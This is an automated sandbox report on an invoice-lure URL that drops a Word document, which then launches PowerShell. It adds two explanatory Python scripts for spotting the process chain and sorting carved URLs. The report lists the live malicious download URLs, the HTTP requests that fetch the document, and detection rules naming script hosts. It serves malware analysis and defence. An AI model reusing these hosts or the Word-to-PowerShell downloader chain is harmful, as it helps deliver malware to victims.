
Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:46214
Start time:21:33:44
Joe Sandbox Product:CloudBasic
Start date:12.02.2018
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:http://royal-tec.com/Paid-Invoices
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal72.evad.expl.win@11/29@8/3
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • URL browsing timeout
Warnings:
  • Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe


Detection

Strategy:Threshold
Score:72
Range:0 - 100
Reporting:Report FP / FN
Detection:malicious


Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview



Software Vulnerabilities:

Browser exploit detected (process start blacklist hit)
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
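The signature above fires on a parent/child pair, not on anything inside the document: the browser (iexplore.exe) started WINWORD.EXE, and later in this report WINWORD.EXE started powershell.exe. The following is an added example of that kind of process-start blacklist check written for this page; it is not Joe Sandbox code. The blacklist table, the PIDs and the sample events are assumptions constructed to mirror the chain the report shows.

```python
"""Process-start blacklist check in the spirit of this report's 'Browser exploit
detected (process start blacklist hit)' signature. Added example, not Joe
Sandbox code; the blacklist table and the sample events below are assumptions
built to mirror the chain the report shows (iexplore.exe -> WINWORD.EXE ->
powershell.exe). PIDs are invented."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple
import ntpath


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str  # full path of the newly created process


# Parent/child image pairs that should not occur during normal use (assumed table).
BROWSERS: Set[str] = {"iexplore.exe", "firefox.exe", "chrome.exe"}
OFFICE: Set[str] = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS: Set[str] = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

BLACKLIST: List[Tuple[Set[str], Set[str], str]] = [
    (BROWSERS, OFFICE, "browser spawned an Office application (document handed straight to Office)"),
    (OFFICE, SCRIPT_HOSTS, "Office spawned a script host (macro dropper/downloader pattern)"),
]


def image_name(path: str) -> str:
    """Case-insensitive basename so 'WINWORD.EXE' matches 'winword.exe'."""
    return ntpath.basename(path).lower()


def blacklist_hits(events: List[ProcessEvent]) -> List[Tuple[str, str, str]]:
    """Return (parent, child, reason) for every event whose parent/child pair is blacklisted."""
    by_pid: Dict[int, ProcessEvent] = {e.pid: e for e in events}
    hits: List[Tuple[str, str, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue  # parent not in the capture (started before monitoring began)
        for parents, children, reason in BLACKLIST:
            if image_name(parent.image) in parents and image_name(e.image) in children:
                hits.append((image_name(parent.image), image_name(e.image), reason))
    return hits


def process_chain(events: List[ProcessEvent], pid: int) -> List[str]:
    """Follow ppid links upward and return the image names root-first."""
    by_pid = {e.pid: e for e in events}
    chain: List[str] = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


# Constructed sample: the chain this report describes plus benign neighbours.
SAMPLE_EVENTS = [
    ProcessEvent(1000, 4, r"C:\Windows\explorer.exe"),
    ProcessEvent(2000, 1000, r"C:\Program Files\Internet Explorer\iexplore.exe"),
    ProcessEvent(2010, 2000, r"C:\Program Files\Internet Explorer\iexplore.exe"),  # tab process
    ProcessEvent(3000, 2010, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
    ProcessEvent(4000, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(4010, 4000, r"C:\Windows\System32\conhost.exe"),
]

if __name__ == "__main__":
    for parent, child, reason in blacklist_hits(SAMPLE_EVENTS):
        print(f"{parent} -> {child}: {reason}")
    print(" -> ".join(process_chain(SAMPLE_EVENTS, 4000)))
```

The same check runs unchanged over Sysmon event ID 1 or any EDR process-creation feed once the records are mapped onto ProcessEvent; the point of keeping a parent lookup rather than matching on the child alone is that powershell.exe is common, while powershell.exe whose parent is WINWORD.EXE is not.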

Networking:

Downloads files
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid-Invoices[1].doc
Downloads files from webservers via HTTP
Source: global traffic, HTTP traffic detected:
  GET /Paid-Invoices HTTP/1.1
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: royal-tec.com
  DNT: 1
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /Paid-Invoices/ HTTP/1.1
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: royal-tec.com
  Connection: Keep-Alive
  DNT: 1
Found strings which match to known social media urls
Source: iexplore.exeString found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: iexplore.exeString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: iexplore.exeString found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: iexplore.exeString found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: iexplore.exeString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.drString found in binary or memory: <domain uaString="11">messenger.yahoo.com</domain> equals www.yahoo.com (Yahoo)
Source: iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.drString found in binary or memory: <domain uaString="Firefox Token NoPlat">login.yahoo.com</domain> equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)
Source: iexplore.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: iexplore.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: royal-tec.com
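The per-source string lists in this report mix a handful of URLs carved from powershell.exe memory with hundreds of search-provider, CRL and OCSP URLs that ship inside iexplore.exe, plus truncated carvings such as "http://erst". The following is an added example of how to triage such a list; it is not Joe Sandbox tooling. The regexes, the allowlist and the REPORT_LINES excerpt are assumptions (the excerpt is constructed from lines in the shape this report uses).

```python
"""Triage of a 'Urls found in memory or binary data' list: keep only well-formed
URLs, group them by the process or dropped file they were carved from, and
subtract everything the browser itself contains, so the few URLs that exist only
in powershell.exe memory stand out. Added example, not Joe Sandbox tooling; the
regexes, the allowlist and the REPORT_LINES excerpt are assumptions (the excerpt
is constructed from lines in the shape this report uses)."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple
from urllib.parse import urlsplit

LINE_RE = re.compile(r"^Source: (?P<src>.+?)String found in binary or memory: (?P<s>.*)$")
# Complete URL: scheme, host with a letters-only TLD, optional path of unsurprising characters.
# Truncated carvings ('http://erst'), DER residue ('...com0') and '#'/'%' fragments fail this.
URL_RE = re.compile(r"^https?://(?P<host>[a-z0-9.-]+\.[a-z]{2,})(?P<path>/[A-Za-z0-9._~/-]*)?$", re.I)


def parse_line(line: str) -> Optional[Tuple[List[str], str]]:
    """Split a report line into its list of sources and the carved string."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return [s.strip() for s in m.group("src").split(",")], m.group("s")


def is_complete_url(s: str) -> bool:
    return URL_RE.match(s) is not None


def urls_by_source(lines: Iterable[str]) -> Dict[str, Set[str]]:
    """Well-formed URLs keyed by the process or dropped file they were found in."""
    grouped: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        sources, s = parsed
        if is_complete_url(s):
            for src in sources:
                grouped[src].add(s)
    return grouped


def candidate_payload_urls(lines, noisy_sources=("iexplore.exe",), allow_hosts=("java.com",)):
    """URLs carved from non-browser sources, minus anything also present in the
    browser and minus allowlisted hosts. The allowlist is an assumption for this demo."""
    grouped = urls_by_source(lines)
    noise: Set[str] = set()
    for src in noisy_sources:
        noise |= grouped.get(src, set())
    candidates: Set[str] = set()
    for src, urls in grouped.items():
        if src not in noisy_sources:
            candidates |= urls
    candidates -= noise
    return sorted(u for u in candidates if urlsplit(u).hostname not in allow_hosts)


# Constructed excerpt in the shape of this report's string list.
REPORT_LINES = """\
Source: powershell.exeString found in binary or memory: http://erst
Source: powershell.exeString found in binary or memory: http://erste.vip/nH0tN/
Source: powershell.exeString found in binary or memory: http://tceele.com/NCbJ/
Source: powershell.exeString found in binary or memory: http://about.megaxus.com/v1/images/article/IpjKJT/
Source: powershell.exeString found in binary or memory: http://java.com/help
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: iexplore.exeString found in binary or memory: http://search.yahoo.com/
Source: iexplore.exe, Paid-Invoices[1].htm.1.drString found in binary or memory: http://royal-tec.com/Paid-Invoices/
Source: Paid Invoice.doc.usc4tz8.partial.1.drString found in binary or memory: http://ersmgY
""".splitlines()

if __name__ == "__main__":
    for src, urls in sorted(urls_by_source(REPORT_LINES).items()):
        print(f"{src}: {len(urls)} url(s)")
    print(candidate_payload_urls(REPORT_LINES))
```

Subtracting the browser's own URL set is what removes the landing page (royal-tec.com) from the candidates, since it is also present in the dropped .htm file; what survives are the hosts that only the script host knew about, which is the set worth blocking and pivoting on. A truncated carving that fails the URL check is still worth a glance, because "http://erst" is a prefix of a URL that does pass.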
Urls found in memory or binary data
Source: powershell.exeString found in binary or memory: file://
Source: iexplore.exe, powershell.exeString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///$
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Conte
Source: powershell.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/T
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microsoft.PowerShell.ConsoleHost.resources/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/o
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.config
Source: ver40A7.tmp.1.drString found in binary or memory: http://
Source: iexplore.exeString found in binary or memory: http://%s.com
Source: iexplore.exeString found in binary or memory: http://Trn
Source: powershell.exeString found in binary or memory: http://about.megaxus.com/v1/images/article/IpjKJT/
Source: iexplore.exeString found in binary or memory: http://amazon.fr/
Source: iexplore.exeString found in binary or memory: http://api.bing.com/qsml.aspx?query=
Source: iexplore.exeString found in binary or memory: http://ariadna.elmundo.es/
Source: iexplore.exeString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: iexplore.exeString found in binary or memory: http://arianna.libero.it/
Source: iexplore.exeString found in binary or memory: http://arianna.libero.it/favicon.ico
Source: iexplore.exeString found in binary or memory: http://asp.usatoday.com/
Source: iexplore.exeString found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://auone.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: iexplore.exeString found in binary or memory: http://br.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://browse.guardian.co.uk/
Source: iexplore.exeString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.buscape.com.br/
Source: iexplore.exeString found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.igbusca.com.br/
Source: iexplore.exeString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: iexplore.exeString found in binary or memory: http://busca.orange.es/
Source: iexplore.exeString found in binary or memory: http://busca.uol.com.br/
Source: iexplore.exeString found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: iexplore.exeString found in binary or memory: http://buscador.lycos.es/
Source: iexplore.exeString found in binary or memory: http://buscador.terra.com.br/
Source: iexplore.exeString found in binary or memory: http://buscador.terra.com/
Source: iexplore.exeString found in binary or memory: http://buscador.terra.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://buscador.terra.es/
Source: iexplore.exeString found in binary or memory: http://buscar.ozu.es/
Source: iexplore.exeString found in binary or memory: http://buscar.ya.com/
Source: iexplore.exeString found in binary or memory: http://busqueda.aol.com.mx/
Source: iexplore.exeString found in binary or memory: http://cerca.lycos.it/
Source: iexplore.exeString found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: iexplore.exeString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: iexplore.exeString found in binary or memory: http://cn.bing.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://cn.bing.com/search?q=
Source: iexplore.exeString found in binary or memory: http://cnet.search.com/
Source: iexplore.exeString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://corp.naukri.com/
Source: iexplore.exeString found in binary or memory: http://corp.naukri.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://crl.comodo.net//J
Source: iexplore.exeString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: iexplore.exeString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: iexplore.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: iexplore.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: iexplore.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: iexplore.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: iexplore.exeString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: iexplore.exeString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: iexplore.exeString found in binary or memory: http://crt.comodoca.com/
Source: iexplore.exeString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: iexplore.exeString found in binary or memory: http://cs.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://cs.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://cs.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: iexplore.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: iexplore.exeString found in binary or memory: http://de.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://de.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://de.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://de.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://en.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://en.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://en.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: powershell.exeString found in binary or memory: http://er
Source: powershell.exeString found in binary or memory: http://ers
Source: Paid Invoice.doc.usc4tz8.partial.1.drString found in binary or memory: http://ersmgY
Source: powershell.exeString found in binary or memory: http://erst
Source: powershell.exeString found in binary or memory: http://erste.vip/nH0tN/
Source: iexplore.exeString found in binary or memory: http://es.ask.com/
Source: iexplore.exeString found in binary or memory: http://es.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://es.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://es.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://es.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://esearch.rakuten.co.jp/
Source: iexplore.exeString found in binary or memory: http://espanol.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://espn.go.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://find.joins.com/
Source: iexplore.exeString found in binary or memory: http://fr.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://fr.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://fr.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://fr.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://google.pchome.com.tw/
Source: iexplore.exeString found in binary or memory: http://home.altervista.org/
Source: iexplore.exeString found in binary or memory: http://home.altervista.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: iexplore.exeString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: iexplore.exeString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: iexplore.exeString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: iexplore.exeString found in binary or memory: http://images.monster.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: iexplore.exeString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: iexplore.exeString found in binary or memory: http://in.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://it.search.dada.net/
Source: iexplore.exeString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: iexplore.exeString found in binary or memory: http://it.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://it.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://it.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://it.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://ja.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://ja.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://ja.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: powershell.exeString found in binary or memory: http://java.com/
Source: powershell.exeString found in binary or memory: http://java.com/help
Source: powershell.exeString found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exeString found in binary or memory: http://java.com/http://java.com/
Source: iexplore.exeString found in binary or memory: http://jobsearch.monster.com/
Source: iexplore.exeString found in binary or memory: http://kr.search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://list.taobao.com/
Source: iexplore.exeString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: iexplore.exeString found in binary or memory: http://m
Source: iexplore.exeString found in binary or memory: http://mail.live.com/
Source: iexplore.exeString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: iexplore.exeString found in binary or memory: http://msk.afisha.ru/
Source: iexplore.exeString found in binary or memory: http://nl.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://nl.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://nl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: WINWORD.EXEString found in binary or memory: http://ns.
Source: iexplore.exeString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: iexplore.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: iexplore.exe, 6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.0.dr, 6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.com0:
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlVE
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlf
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crllE
Source: iexplore.exeString found in binary or memory: http://ocsp.entrust.net03
Source: iexplore.exeString found in binary or memory: http://ocsp.entrust.net0D
Source: iexplore.exeString found in binary or memory: http://ocsp.msocsp.com0
Source: iexplore.exeString found in binary or memory: http://ocsp?J
Source: iexplore.exeString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: iexplore.exeString found in binary or memory: http://p.zhongsou.com/
Source: iexplore.exeString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pl.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://pl.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://price.ru/
Source: iexplore.exeString found in binary or memory: http://price.ru/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pt.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://pt.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://pt.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://recherche.linternaute.com/
Source: iexplore.exeString found in binary or memory: http://recherche.tf1.fr/
Source: iexplore.exeString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: iexplore.exeString found in binary or memory: http://rover.ebay.com
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices
Source: iexplore.exe, Paid-Invoices[1].htm.1.drString found in binary or memory: http://royal-tec.com/Paid-Invoices/
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/#
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/(
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/3
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/:
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/C:
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices/N
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-Invoices5
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-InvoicesB
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-InvoicesH
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/Paid-InvoiceshTerms
Source: iexplore.exeString found in binary or memory: http://royal-tec.com/h
Source: iexplore.exeString found in binary or memory: http://ru.search.yahoo.com
Source: iexplore.exeString found in binary or memory: http://ru.wikipedia.org/
Source: iexplore.exeString found in binary or memory: http://ru.wikipedia.org/favicon.ico
Source: iexplore.exeString found in binary or memory: http://ru.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exeString found in binary or memory: http://sads.myspace.com/
Source: iexplore.exeString found in binary or memory: http://search-dyn.tiscali.it/
Source: iexplore.exeString found in binary or memory: http://search.about.com/
Source: iexplore.exeString found in binary or memory: http://search.alice.it/
Source: iexplore.exeString found in binary or memory: http://search.alice.it/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.aol.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.aol.com/
Source: iexplore.exeString found in binary or memory: http://search.aol.in/
Source: iexplore.exeString found in binary or memory: http://search.atlas.cz/
Source: iexplore.exeString found in binary or memory: http://search.auction.co.kr/
Source: iexplore.exeString found in binary or memory: http://search.auone.jp/
Source: iexplore.exeString found in binary or memory: http://search.books.com.tw/
Source: iexplore.exeString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.centrum.cz/
Source: iexplore.exeString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.chol.com/
Source: iexplore.exeString found in binary or memory: http://search.chol.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.cn.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://search.daum.net/
Source: iexplore.exeString found in binary or memory: http://search.daum.net/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.dreamwiz.com/
Source: iexplore.exeString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.ebay.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.ebay.com/
Source: iexplore.exeString found in binary or memory: http://search.ebay.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.ebay.de/
Source: iexplore.exeString found in binary or memory: http://search.ebay.es/
Source: iexplore.exeString found in binary or memory: http://search.ebay.fr/
Source: iexplore.exeString found in binary or memory: http://search.ebay.in/
Source: iexplore.exeString found in binary or memory: http://search.ebay.it/
Source: iexplore.exeString found in binary or memory: http://search.empas.com/
Source: iexplore.exeString found in binary or memory: http://search.empas.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.espn.go.com/
Source: iexplore.exeString found in binary or memory: http://search.gamer.com.tw/
Source: iexplore.exeString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.gismeteo.ru/
